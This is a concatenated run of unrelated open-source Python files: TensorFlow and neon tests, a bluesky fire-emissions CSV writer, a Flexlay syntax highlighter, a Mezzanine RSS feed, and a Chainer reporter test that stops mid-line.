norm_samps, sasnorm_samps = sess.run( [norm.sample(int(5e5), seed=1), sasnorm.sample(int(5e5), seed=1)]) np.testing.assert_array_less( np.percentile(norm_samps, 0.1, axis=0), np.percentile(sasnorm_samps, 0.1, axis=0)) np.testing.assert_array_less( np.percentile(sasnorm_samps, 99.9, axis=0), np.percentile(norm_samps, 99.9, axis=0)) # 100. * sp.stats.norm.cdf(2.) q = 100 * 0.97724986805182079 self.assertAllClose( np.percentile(sasnorm_samps, q, axis=0), np.percentile(norm_samps, q, axis=0), rtol=0.03) self.assertAllClose( np.percentile(sasnorm_samps, 100 - q, axis=0), np.percentile(norm_samps, 100 - q, axis=0), rtol=0.03) def test_tailweight_large_gives_more_outliers_than_normal(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.0) loc = rng.randn(d) with self.cached_session() as sess: norm = ds.MultivariateNormalDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, tailweight=3., validate_args=True) # norm.pdf(x) is smaller on outliers (+-10 are outliers) x = np.float64([[-10] * d, [10] * d]) # Shape [2, 10] norm_lp, sasnorm_lp = sess.run([norm.log_prob(x), sasnorm.log_prob(x)]) np.testing.assert_array_less(norm_lp, sasnorm_lp) # 0.1% quantile and 99.9% quantile are outliers, and should be more # extreme in the sasnormal. The 97.772% quantiles should be the same. norm_samps, sasnorm_samps = sess.run( [norm.sample(int(5e5), seed=2), sasnorm.sample(int(5e5), seed=2)]) np.testing.assert_array_less( np.percentile(sasnorm_samps, 0.1, axis=0), np.percentile(norm_samps, 0.1, axis=0)) np.testing.assert_array_less( np.percentile(norm_samps, 99.9, axis=0), np.percentile(sasnorm_samps, 99.9, axis=0)) # 100. * sp.stats.norm.cdf(2.) 
q = 100 * 0.97724986805182079 self.assertAllClose( np.percentile(sasnorm_samps, q, axis=0), np.percentile(norm_samps, q, axis=0), rtol=0.03) self.assertAllClose( np.percentile(sasnorm_samps, 100 - q, axis=0), np.percentile(norm_samps, 100 - q, axis=0), rtol=0.03) def test_positive_skewness_moves_mean_to_the_right(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.0) loc = rng.randn(d) with self.cached_session() as sess: sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, skewness=3.0, validate_args=True) sasnorm_samps = sess.run(sasnorm.sample(10000, seed=4)) np.testing.assert_array_less(loc, sasnorm_samps.mean(axis=0)) def test_consistency_random_parameters_with_batch_dim(self): b, d = 5, 2 scale_diag = rng.rand(b, d) scale_identity_multiplier = np.float64(1.1) with self.cached_session() as sess: sasnorm = ds.VectorSinhArcsinhDiag( scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, skewness=rng.randn(d) * 0.5, tailweight=rng.rand(b, d) + 0.7, validate_args=True) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=0., rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=-0.15, rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=0.15, rtol=0.1) def test_consistency_random_parameters_no_batch_dims(self): d = 3 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.1) with self.cached_session() as sess: sasnorm = ds.VectorSinhArcsinhDiag( scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, skewness=rng.randn(d) * 0.5, tailweight=rng.rand(d) + 0.7, validate_args=True) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=0., rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=-0.15, rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, 
sasnorm, radius=1.0, center=0.15, rtol=0.1) def test_pdf_reflected_for_negative_skewness(self): with self.cached_session() as sess: sas_pos_skew = ds.VectorSinhArcsinhDiag( loc=[0.], scale_identity_multiplier=1., skewness=2., validate_args=True) sas_neg_skew = ds.VectorSinhArcsinhDiag( loc=[0.], scale_identity_multiplier=1., skewness=-2., validate_args=True) x = np.linspace(-2, 2, num=5).astype(np.float32).reshape(5, 1) self.assertAllClose( *sess.run([sas_pos_skew.prob(x), sas_neg_skew.prob(x[::-1])])) if __name__ == "__main__": test.main()
apache-2.0
kashif/neon
neon/layers/tests/test_fully_connected.py
9
3084
#!/usr/bin/env python # ---------------------------------------------------------------------------- # Copyright 2014 Nervana Systems Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------- from nose.plugins.attrib import attr from neon.backends.cpu import CPU from neon.layers import FCLayer from neon.params import IdentityValGen from neon.util.testing import assert_tensor_equal nin = 3 nout = 2 batch_size = 10 def check_fprop(layer, backend): inputs = backend.ones((nin, batch_size)) output = backend.ones((nout, batch_size)) layer.fprop(inputs) assert_tensor_equal(layer.output, output) def check_bprop(layer, backend): errors = backend.ones((nout, batch_size)) deltas = backend.zeros((nin, batch_size)) deltas[:2] = backend.ones((nout, batch_size)) # initialize deltas since they are not set # by the layer initialize method. layer.deltas = backend.ones((nin, batch_size)) # layers should be refactored to remove references # to external layers. inputs can be cached during # fprop. 
class PreviousLayer(object): def __init__(self): self.is_data = True self.output = backend.ones((nin, batch_size)) layer.prev_layer = PreviousLayer() layer.bprop(errors) assert_tensor_equal(layer.deltas, deltas) class TestFullyConnectedLayer(object): def create_layer(self, backend): weight_init = IdentityValGen() layer = FCLayer(nin=nin, nout=nout, batch_size=batch_size, weight_init=weight_init, backend=backend) layer.set_weight_shape() layer.initialize([]) return layer def test_cpu_fprop(self): backend = CPU(rng_seed=0) layer = self.create_layer(backend=backend) check_fprop(layer, backend) def test_cpu_bprop(self): backend = CPU(rng_seed=0) layer = self.create_layer(backend=backend) check_bprop(layer, backend) @attr('cuda') def test_gpu_fprop(self): from neon.backends.cc2 import GPU backend = GPU(rng_seed=0) layer = self.create_layer(backend=backend) check_fprop(layer, backend) @attr('cuda') def test_gpu_bprop(self): from neon.backends.cc2 import GPU backend = GPU(rng_seed=0) layer = self.create_layer(backend=backend) check_bprop(layer, backend)
apache-2.0
pnwairfire/bluesky
bluesky/extrafilewriters/firescsvs.py
1
15135
"""bluesky.extrafilewriters.firescsvs Writes fire emissions csv file in the form: fire_id,hour,ignition_date_time,date_time,area_fract,flame_profile,smolder_profile,residual_profile,pm25_emitted,pm10_emitted,co_emitted,co2_emitted,ch4_emitted,nox_emitted,nh3_emitted,so2_emitted,voc_emitted,pm25_flame,pm10_flame,co_flame,co2_flame,ch4_flame,nox_flame,nh3_flame,so2_flame,voc_flame,pm25_smold,pm10_smold,co_smold,co2_smold,ch4_smold,nox_smold,nh3_smold,so2_smold,voc_smold,pm25_resid,pm10_resid,co_resid,co2_resid,ch4_resid,nox_resid,nh3_resid,so2_resid,voc_resid,smoldering_fraction,heat,percentile_000,percentile_005,percentile_010,percentile_015,percentile_020,percentile_025,percentile_030,percentile_035,percentile_040,percentile_045,percentile_050,percentile_055,percentile_060,percentile_065,percentile_070,percentile_075,percentile_080,percentile_085,percentile_090,percentile_095,percentile_100 SF11C38780083219874810,0,201803170000-08:00,201803170000-08:00,0.0057,0.0057,0.0057,0.0057,0.009475,0.011181,0.10173,1.720376,0.005177,0.00232,0.001688,0.001049,0.024262,0.006488,0.007655,0.063984,1.470124,0.003404,0.002157,0.001075,0.000873,0.015454,0.001597,0.001885,0.02018,0.133793,0.000948,8.7e-05,0.000328,9.4e-05,0.004709,0.00139,0.001641,0.017566,0.116459,0.000825,7.6e-05,0.000285,8.2e-05,0.004099,0.981589,193672.799534,1.937531,2.07856035,2.2195897,2.36061905,2.5016484,2.64267775,2.7837071,2.92473645,3.0657658,3.20679515,3.3478245,3.48885385,3.6298832,3.77091255,3.9119419,4.05297125,4.1940006,4.33502995,4.4760593,4.61708865,4.758118 
SF11C38780083219874810,1,201803170000-08:00,201803170100-08:00,0.0057,0.0057,0.0057,0.0057,0.009475,0.011181,0.10173,1.720376,0.005177,0.00232,0.001688,0.001049,0.024262,0.006488,0.007655,0.063984,1.470124,0.003404,0.002157,0.001075,0.000873,0.015454,0.001597,0.001885,0.02018,0.133793,0.000948,8.7e-05,0.000328,9.4e-05,0.004709,0.00139,0.001641,0.017566,0.116459,0.000825,7.6e-05,0.000285,8.2e-05,0.004099,0.981589,193672.799534,1.937531,2.0958799,2.2542288,2.4125777,2.5709266,2.7292755,2.8876244,3.0459733,3.2043222,3.3626711,3.52102,3.6793689,3.8377178,3.9960667,4.1544156,4.3127645,4.4711134,4.6294623,4.7878112,4.9461601,5.104509 SF11C38780083219874810,2,201803170000-08:00,201803170200-08:00,0.0057,0.0057,0.0057,0.0057,0.009475,0.011181,0.10173,1.720376,0.005177,0.00232,0.001688,0.001049,0.024262,0.006488,0.007655,0.063984,1.470124,0.003404,0.002157,0.001075,0.000873,0.015454,0.001597,0.001885,0.02018,0.133793,0.000948,8.7e-05,0.000328,9.4e-05,0.004709,0.00139,0.001641,0.017566,0.116459,0.000825,7.6e-05,0.000285,8.2e-05,0.004099,0.987726,129115.199689,1.937531,2.04076465,2.1439983,2.24723195,2.3504656,2.45369925,2.5569329,2.66016655,2.7634002,2.86663385,2.9698675,3.07310115,3.1763348,3.27956845,3.3828021,3.48603575,3.5892694,3.69250305,3.7957367,3.89897035,4.002204 ... 
""" import csv import logging import os from afdatetime import parsing as datetime_parsing from blueskykml import fires as blueskykml_fires from bluesky import locationutils from bluesky.config import Config BLUESKYKML_DATE_FORMAT = blueskykml_fires.FireData.date_time_format # as of blueskykml v0.2.5, this list is: # 'pm25', 'pm10', 'co', 'co2', 'ch4', 'nox', 'nh3', 'so2', 'voc' # Note that blueskykml expects 'pm25', not 'pm2.5' BLUESKYKML_SPECIES_LIST = [s.upper() for s in blueskykml_fires.FireData.emission_fields] if 'NOX' in BLUESKYKML_SPECIES_LIST: BLUESKYKML_SPECIES_LIST.remove('NOX') BLUESKYKML_SPECIES_LIST.append('NOx') ## ## Functions for extracting fire *location * information to write to csv files ## ## Note: The activity object (arg 'g') is ignored in most of these methods. ## It's only needed for the start time and area calculation ## def _pick_representative_fuelbed(fire, loc): fuelbeds = [f for f in loc.get('fuelbeds', []) if hasattr(f.get('pct', 0.0), 'real') and f.get('fccs_id')] if fuelbeds: fuelbeds = sorted(fuelbeds, key=lambda fb: fb.get('pct', 0.0), reverse=True) return fuelbeds[0]['fccs_id'] def _get_fuelbed_fractions(fire, loc): fuelbeds = [f for f in loc.get('fuelbeds', []) if hasattr(f.get('pct', 0.0), 'real') and f.get('fccs_id')] if fuelbeds: fuelbeds = sorted(fuelbeds, key=lambda fb: fb.get('pct', 0.0), reverse=True) fuelbed_fractions = '' for fb in fuelbeds: fuelbed_fractions += str(fb["fccs_id"]) + ' ' + str(round(fb['pct']/100,2)) + '; ' return fuelbed_fractions.rstrip("; ") def _get_heat(fire, loc): if loc.get('fuelbeds'): heat = [fb.get('heat', {}).get('total') for fb in loc['fuelbeds']] # non-None value will be returned if species is defined for all fuelbeds if not any([v is None for v in heat]): # heat is array of arrays return sum([sum(h) for h in heat]) def _get_consumption_field(field): def f(fire, loc): # If consumption is already summarized for this activity # window, return summary value if loc.get('consumption') and 
loc['consumption'].get('summary'): return loc['consumption']['summary'].get(field) # Otherwise, iterate through fuelbeds, fuel categories, and # fuel subcategories elif loc.get('fuelbeds'): try: val = 0.0 for fb in loc['fuelbeds']: for cat_dict in fb['consumption'].values(): for subcat_dict in cat_dict.values(): if field == 'total': val = sum([e[0] for e in subcat_dict.values()]) else: val += subcat_dict[field][0] return val except Exception as e: logging.warning("Failed to sum '{}' consumption " "for fire {}: {}".format(field, fire.id, e)) return f def _get_emissions_species(species): # TODO: if any fuelbed has species undefined, abort and set fire'set # cumulative value to None ? def f(fire, loc): if loc.get('fuelbeds'): species_array = [] for fb in loc['fuelbeds']: total = fb.get('emissions', {}).get('total', {}) # Try species as is, as all lowercase, and as all uppercase # append even if not defined, since we check bdlow if all or none species_array.append( total.get(species) or total.get(species.lower()) or total.get(species.upper()) ) # non-None value will be returned if species is defined for all fuelbeds if not any([v is None for v in species_array]): return sum([sum(a) for a in species_array]) return f def _get_location_value(key, is_float): def f(fire, loc): val = loc.get(key) if val: return float(val) if is_float else val return f # Fire locations csv columns from BSF: # id,event_id,latitude,longitude,type,area,date_time,elevation,slope, # state,county,country,fips,scc,fuel_1hr,fuel_10hr,fuel_100hr,fuel_1khr, # fuel_10khr,fuel_gt10khr,shrub,grass,rot,duff,litter,moisture_1hr, # moisture_10hr,moisture_100hr,moisture_1khr,moisture_live,moisture_duff, # consumption_flaming,consumption_smoldering,consumption_residual, # consumption_duff,min_wind,max_wind,min_wind_aloft,max_wind_aloft, # min_humid,max_humid,min_temp,max_temp,min_temp_hour,max_temp_hour, # sunrise_hour,sunset_hour,snow_month,rain_days,heat,pm25,pm10,co,co2, # 
ch4,nox,nh3,so2,voc,canopy,event_url,fccs_number,owner,sf_event_guid, # sf_server,sf_stream_name,timezone,veg FIRE_LOCATIONS_CSV_FIELDS = ( [ ('id', lambda f, loc: f.id), ('event_id', lambda f, loc: f.get('event_of', {}).get('id')), ('latitude', lambda f, loc: locationutils.LatLng(loc).latitude), ('longitude', lambda f, loc: locationutils.LatLng(loc).longitude), ('utc_offset', lambda f, loc: loc.get('utc_offset')), ('source', lambda f, loc: loc.get('source')), # Note: We're keeping the 'type' field consistent with the csv files # generated by smartfire, which use 'RX' and 'WF' ('type', lambda f, loc: 'RX' if f.type == 'rx' else 'WF'), ('date_time', lambda f, loc: datetime_parsing.parse(loc['start']).strftime(BLUESKYKML_DATE_FORMAT)), ('event_name', lambda f, loc: f.get('event_of', {}).get('name')), ('fccs_number', _pick_representative_fuelbed), ('fuelbed_fractions', _get_fuelbed_fractions), # TDOO: add 'VEG'? (Note: sf2 has 'veg' field, but # it seems to be a fuelbed discription which is probably for # the one fccs id in the sf2 feed. This single fccs id and its description # don't necesasrily represent the entire fire area, which could have # multiple fuelbeds. we could set 'VEG' to # a concatenation of the fuelbeds or the one one making up the largest # fraction of the fire.) 
('heat', _get_heat) ] # emissions + [ (s.lower(), _get_emissions_species('PM2.5' if s == 'pm25' else s)) for s in BLUESKYKML_SPECIES_LIST if s ] # consumption + [ ('consumption_' + k, _get_consumption_field(k)) for k in [ # Note: BSF included 'consumption_duff', but duff values # aren't readily available in pipeline output 'total', 'flaming', 'smoldering', 'residual' ] ] # float value location fields + [ (k, _get_location_value(k, True)) for k in [ 'area', 'elevation', 'slope', 'moisture_1hr','moisture_10hr', 'moisture_100hr','moisture_1khr', 'moisture_live','moisture_duff', 'canopy_consumption_pct', 'min_wind','max_wind', 'min_wind_aloft', 'max_wind_aloft', 'min_humid','max_humid', 'min_temp','max_temp', 'min_temp_hour','max_temp_hour', 'sunrise_hour','sunset_hour', 'snow_month','rain_days' ] ] # string value location fields + [ (k, _get_location_value(k, False)) for k in [ 'state', 'county', 'country' ] ] # TODO: Add other fields if users want them # TODO: add other sf2 fields # 'fuel_1hr', 'fuel_10hr', 'fuel_100hr', # 'fuel_1khr', 'fuel_10khr', 'fuel_gt10khr' # 'canopy','shrub','grass','rot','duff', 'litter', 'VEG', # 'heat','owner','sf_event_guid','sf_server', # 'sf_stream_name','fips','scc' ) """List of fire location csv fields, with function to extract from fire object""" ## ## Functions for extracting fire *event* information to write to csv files ## def _assign_event_name(event, fire_loc): name = fire_loc.get('event_name') if name: if event.get('name') and name != event['name']: logging.warning("Fire {} event name conflict: '{}' != '{}'".format( fire_loc['id'], name, event['name'])) return name def _update_event_area(event, fire_loc): if fire_loc['area'] is None: raise ValueError("Fire {} location lacks area".format(fire_loc['id'])) return event.get('total_area', 0.0) + fire_loc['area'] def _update_total_heat(event, fire_loc): if 'total_heat' in event and event['total_heat'] is None: # previous fire didn't have heat defined; abort so # that we don't end up 
with misleading partial heat return logging.debug("total fire heat: %s", fire_loc.get('heat')) if fire_loc.get('heat'): return event.get('total_heat', 0.0) + fire_loc['heat'] def _update_total_emissions_species(species): key = 'total_{}'.format(species) def f(event, fire_loc): if key in event and event[key] is None: # previous fire didn't have this emissions value defined; abort so # that we don't end up with misleading partial total return if not fire_loc.get(species): # this fire doesn't have this emissions value defined; abort, # throwing away whatever is recorded in event[key], so # that we don't end up with misleading partial total return return event.get(key, 0.0) + fire_loc[species] return f # Fire events csv columns from BSF: # id,event_name,total_area,total_heat,total_pm25,total_pm10,total_pm, # total_co,total_co2,total_ch4,total_nmhc,total_nox,total_nh3,total_so2, # total_voc,total_bc,total_h2,total_nmoc,total_no,total_no2,total_oc, # total_tpc,total_tpm FIRE_EVENTS_CSV_FIELDS = [ ('name', _assign_event_name), ('total_heat', _update_total_heat), ('total_area', _update_event_area), ('total_nmhc', _update_total_emissions_species('nmhc')) ] + [ ('total_{}'.format(s.lower()), _update_total_emissions_species(s.lower())) for s in BLUESKYKML_SPECIES_LIST ] """List of fire event csv fields, with function to extract from fire object and aggregate. Note that this list lacks 'id', which is the first column. 
""" ## ## Writer class ## class FiresCsvsWriter(object): def __init__(self, dest_dir, **kwargs): fl = (kwargs.get('fire_locations_filename') or Config().get('extrafiles', 'firescsvs', 'fire_locations_filename')) self._fire_locations_pathname = os.path.join(dest_dir, fl) fe = (kwargs.get('fire_events_filename') or Config().get('extrafiles', 'firescsvs', 'fire_events_filename')) self._fire_events_pathname = os.path.join(dest_dir, fe) def write(self, fires_manager): fires, events = self._collect_csv_fields(fires_manager.fires) with open(self._fire_locations_pathname, 'w', encoding="utf-8") as _f: f = csv.writer(_f) f.writerow([k for k, l in FIRE_LOCATIONS_CSV_FIELDS]) for fire in fires: f.writerow([str(fire[k] or '') for k, l in FIRE_LOCATIONS_CSV_FIELDS]) with open(self._fire_events_pathname, 'w', encoding="utf-8") as _f: f = csv.writer(_f) f.writerow(['id'] + [k for k, l in FIRE_EVENTS_CSV_FIELDS]) for e_id, event in list(events.items()): f.writerow([e_id] + [str(event[k] or '') for k, l in FIRE_EVENTS_CSV_FIELDS]) def _collect_csv_fields(self, fires): # As we iterate through fires, collecting necessary fields, collect # events information as well fires_fields = [] for fire in fires: for loc in fire.locations: fires_fields.append({k: l(fire, loc) or '' for k, l in FIRE_LOCATIONS_CSV_FIELDS}) events_fields = {} for ff in fires_fields: e_id = ff.get('event_id') if e_id: events_fields[e_id] = events_fields.get(e_id, {}) for k, l in FIRE_EVENTS_CSV_FIELDS: events_fields[e_id][k] = l(events_fields[e_id], ff) logging.debug("events: %s", events_fields) return fires_fields, events_fields
gpl-3.0
SuperTux/flexlay
text_editor/highlighters/lisp_highlighter.py
1
4604
# Flexlay - A Generic 2D Game Editor # Copyright (C) 2015 Karkus476 <karkus476@yahoo.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import json, re from PyQt4.QtGui import (QSyntaxHighlighter, QTextCharFormat, QFont) from PyQt4.QtCore import Qt from supertux.highlighter import SuperTuxHighlighter, HighlightingRule class SuperTuxLispHighlighter(SuperTuxHighlighter): @staticmethod def clean_text(text): state = 0 tiles = text.find("(tiles") while tiles != -1: close_bracket = text.find(")", tiles) assert close_bracket >= 0 before_length = len(text) text = text[:tiles] + "(tiles"+ text[close_bracket:] after_length = len(text) delta_length = before_length - after_length tiles = text.find("(tiles", close_bracket - delta_length) return text @staticmethod def load_tree_json(filename=None): if not filename or filename[-5:] is not ".json": filename = "highlighters/patterns2.json" patterns_file = open(filename, "r") pattern_tree = json.loads(patterns_file.read()) return pattern_tree @staticmethod def search_tree(tree, tag_list): ''' Searches a tree to find a tag :param tag_list: ["supertux-level", "sector", "name"] :return: QTextCharFormat if possible, else None ''' if tag_list[0] != "supertux-level": print("lisp_highlighter.py Line 53, tag_list is not from a supertux-level") return None tree=tree[tag_list.pop(0)] try: while len(tag_list) > 0: tree = tree["branches"][tag_list.pop(0)] except 
KeyError: return None colour = tree["color"] format = QTextCharFormat() if colour == "black": format.setForeground(Qt.black) elif colour == "blue": format.setForeground(Qt.blue) elif colour == "red": format.setForeground(Qt.red) elif colour == "green": format.setForeground(Qt.green) elif colour == "darkGreen": format.setForeground(Qt.darkGreen) elif colour == "darkBlue": format.setForeground(Qt.darkBlue) elif colour == "darkRed": format.setForeground(Qt.darkRed) elif colour == "magenta": format.setForeground(Qt.magenta) if tree["bold"]: format.setFontWeight(QFont.Bold) if tree["italic"]: format.setFontItalic(True) return format def __init__(self, text_edit, level_file): super().__init__(text_edit) text = level_file.read() text = SuperTuxLispHighlighter.clean_text(text) text_edit.setText(text) self.highlighting_rules += SuperTuxHighlighter.load_patterns("highlighters/patterns.json") string_format = QTextCharFormat() string_format.setForeground(Qt.darkRed) string_pattern = '"' self.string = HighlightingRule(string_pattern, string_format, "string") # comment_format = QTextCharFormat() # comment_format.setForeground(Qt.darkRed) # comment_pattern = r';.*' # comment = HighlightingRule(comment_pattern, comment_format) # # self.highlighting_rules.append(comment) #tree_json = SuperTuxLispHighlighter.load_tree_json() #SuperTuxLispHighlighter.search_tree(tree_json,["supertux-level", "sector", "name"]) def highlightBlock(self, text): for rule in self.highlighting_rules: search = re.search(rule.pattern, text) span = None if not search else search.span() while span: length = span[1] - span[0] self.setFormat(span[0], length, rule.format) search = re.search(rule.pattern, text[span[1]:]) span = None if not search else search.span() self.setCurrentBlockState(0) # EOF #
gpl-3.0
ryneeverett/mezzanine
mezzanine/blog/feeds.py
3
5107
from __future__ import unicode_literals from django.contrib.auth import get_user_model from django.contrib.sites.models import Site from django.contrib.syndication.views import Feed, add_domain from django.core.urlresolvers import reverse from django.shortcuts import get_object_or_404 from django.utils.feedgenerator import Atom1Feed from django.utils.html import strip_tags from mezzanine.blog.models import BlogPost, BlogCategory from mezzanine.conf import settings from mezzanine.core.templatetags.mezzanine_tags import richtext_filters from mezzanine.core.request import current_request from mezzanine.generic.models import Keyword from mezzanine.utils.html import absolute_urls from mezzanine.utils.sites import current_site_id User = get_user_model() try: unicode except NameError: # Python 3 unicode = lambda s: s class PostsRSS(Feed): """ RSS feed for all blog posts. """ def __init__(self, *args, **kwargs): """ Use the title and description of the Blog page for the feed's title and description. If the blog page has somehow been removed, fall back to the ``SITE_TITLE`` and ``SITE_TAGLINE`` settings. 
""" self.tag = kwargs.pop("tag", None) self.category = kwargs.pop("category", None) self.username = kwargs.pop("username", None) super(PostsRSS, self).__init__(*args, **kwargs) self._public = True page = None if "mezzanine.pages" in settings.INSTALLED_APPS: from mezzanine.pages.models import Page try: page = Page.objects.published().get(slug=settings.BLOG_SLUG) except Page.DoesNotExist: pass else: self._public = not page.login_required if self._public: if page is not None: self._title = "%s | %s" % (page.title, settings.SITE_TITLE) self._description = strip_tags(page.description) else: self._title = settings.SITE_TITLE self._description = settings.SITE_TAGLINE def __call__(self, *args, **kwarg): self._request = current_request() self._site = Site.objects.get(id=current_site_id()) return super(PostsRSS, self).__call__(*args, **kwarg) def add_domain(self, link): return add_domain(self._site.domain, link, self._request.is_secure()) def title(self): return unicode(self._title) def description(self): return unicode(self._description) def link(self): return self.add_domain(reverse("blog_post_list")) def items(self): if not self._public: return [] blog_posts = BlogPost.objects.published().select_related("user" ).prefetch_related("categories") if self.tag: tag = get_object_or_404(Keyword, slug=self.tag) blog_posts = blog_posts.filter(keywords__keyword=tag) if self.category: category = get_object_or_404(BlogCategory, slug=self.category) blog_posts = blog_posts.filter(categories=category) if self.username: author = get_object_or_404(User, username=self.username) blog_posts = blog_posts.filter(user=author) limit = settings.BLOG_RSS_LIMIT if limit is not None: blog_posts = blog_posts[:settings.BLOG_RSS_LIMIT] return blog_posts def item_description(self, item): description = richtext_filters(item.content) absolute_urls_name = "mezzanine.utils.html.absolute_urls" if absolute_urls_name not in settings.RICHTEXT_FILTERS: description = absolute_urls(description) return 
unicode(description) def categories(self): if not self._public: return [] return BlogCategory.objects.all() def feed_url(self): return self.add_domain(self._request.path) def item_link(self, item): return self.add_domain(super(PostsRSS, self).item_link(item)) def item_author_name(self, item): return item.user.get_full_name() or item.user.username def item_author_link(self, item): username = item.user.username link = reverse("blog_post_list_author", kwargs={"username": username}) return self.add_domain(link) def item_pubdate(self, item): return item.publish_date def item_categories(self, item): return item.categories.all() def item_enclosure_url(self, item): if item.featured_image: return self.add_domain(item.featured_image.url) def item_enclosure_length(self, item): if item.featured_image: return item.featured_image.size def item_enclosure_mime_type(self, item): if item.featured_image: return item.featured_image.mimetype[0] class PostsAtom(PostsRSS): """ Atom feed for all blog posts. """ feed_type = Atom1Feed def subtitle(self): return self.description() def item_updateddate(self, item): return item.updated
bsd-2-clause
rezoo/chainer
tests/chainer_tests/test_reporter.py
1
15144
import contextlib import tempfile import unittest import numpy import chainer from chainer.backends import cuda from chainer import configuration from chainer import functions from chainer import testing from chainer.testing import attr class TestReporter(unittest.TestCase): def test_empty_reporter(self): reporter = chainer.Reporter() self.assertEqual(reporter.observation, {}) def test_enter_exit(self): reporter1 = chainer.Reporter() reporter2 = chainer.Reporter() with reporter1: self.assertIs(chainer.get_current_reporter(), reporter1) with reporter2: self.assertIs(chainer.get_current_reporter(), reporter2) self.assertIs(chainer.get_current_reporter(), reporter1) def test_scope(self): reporter1 = chainer.Reporter() reporter2 = chainer.Reporter() with reporter1: observation = {} with reporter2.scope(observation): self.assertIs(chainer.get_current_reporter(), reporter2) self.assertIs(reporter2.observation, observation) self.assertIs(chainer.get_current_reporter(), reporter1) self.assertIsNot(reporter2.observation, observation) def test_add_observer(self): reporter = chainer.Reporter() observer = object() reporter.add_observer('o', observer) reporter.report({'x': 1}, observer) observation = reporter.observation self.assertIn('o/x', observation) self.assertEqual(observation['o/x'], 1) self.assertNotIn('x', observation) def test_add_observers(self): reporter = chainer.Reporter() observer1 = object() reporter.add_observer('o1', observer1) observer2 = object() reporter.add_observer('o2', observer2) reporter.report({'x': 1}, observer1) reporter.report({'y': 2}, observer2) observation = reporter.observation self.assertIn('o1/x', observation) self.assertEqual(observation['o1/x'], 1) self.assertIn('o2/y', observation) self.assertEqual(observation['o2/y'], 2) self.assertNotIn('x', observation) self.assertNotIn('y', observation) self.assertNotIn('o1/y', observation) self.assertNotIn('o2/x', observation) def test_report_without_observer(self): reporter = chainer.Reporter() 
reporter.report({'x': 1}) observation = reporter.observation self.assertIn('x', observation) self.assertEqual(observation['x'], 1) class TestKeepGraphOnReportFlag(unittest.TestCase): @contextlib.contextmanager def _scope(self, flag): # If flag is None, return the nop context. # Otherwise, return the context in which # keep_graph_on_report is set temporarily. old = configuration.config.keep_graph_on_report if flag is not None: configuration.config.keep_graph_on_report = flag try: yield finally: configuration.config.keep_graph_on_report = old def test_keep_graph_default(self): x = chainer.Variable(numpy.array([1], numpy.float32)) y = functions.sigmoid(x) reporter = chainer.Reporter() with self._scope(None): reporter.report({'y': y}) self.assertIsNone(reporter.observation['y'].creator) def test_keep_graph(self): x = chainer.Variable(numpy.array([1], numpy.float32)) y = functions.sigmoid(x) reporter = chainer.Reporter() with self._scope(True): reporter.report({'y': y}) assert reporter.observation['y'].creator is not None def test_not_keep_graph(self): x = chainer.Variable(numpy.array([1], numpy.float32)) y = functions.sigmoid(x) reporter = chainer.Reporter() with self._scope(False): reporter.report({'y': y}) self.assertIsNone(reporter.observation['y'].creator) class TestReport(unittest.TestCase): def test_report_without_reporter(self): observer = object() chainer.report({'x': 1}, observer) def test_report(self): reporter = chainer.Reporter() with reporter: chainer.report({'x': 1}) observation = reporter.observation self.assertIn('x', observation) self.assertEqual(observation['x'], 1) def test_report_with_observer(self): reporter = chainer.Reporter() observer = object() reporter.add_observer('o', observer) with reporter: chainer.report({'x': 1}, observer) observation = reporter.observation self.assertIn('o/x', observation) self.assertEqual(observation['o/x'], 1) def test_report_with_unregistered_observer(self): reporter = chainer.Reporter() observer = object() with 
reporter: with self.assertRaises(KeyError): chainer.report({'x': 1}, observer) def test_report_scope(self): reporter = chainer.Reporter() observation = {} with reporter: with chainer.report_scope(observation): chainer.report({'x': 1}) self.assertIn('x', observation) self.assertEqual(observation['x'], 1) self.assertNotIn('x', reporter.observation) class TestSummary(unittest.TestCase): def setUp(self): self.summary = chainer.reporter.Summary() def test_numpy(self): self.summary.add(numpy.array(1, 'f')) self.summary.add(numpy.array(-2, 'f')) mean = self.summary.compute_mean() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) testing.assert_allclose(std, numpy.array(1.5, 'f')) @attr.gpu def test_cupy(self): xp = cuda.cupy self.summary.add(xp.array(1, 'f')) self.summary.add(xp.array(-2, 'f')) mean = self.summary.compute_mean() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) testing.assert_allclose(std, numpy.array(1.5, 'f')) def test_int(self): self.summary.add(1) self.summary.add(2) self.summary.add(3) mean = self.summary.compute_mean() testing.assert_allclose(mean, 2) mean, std = 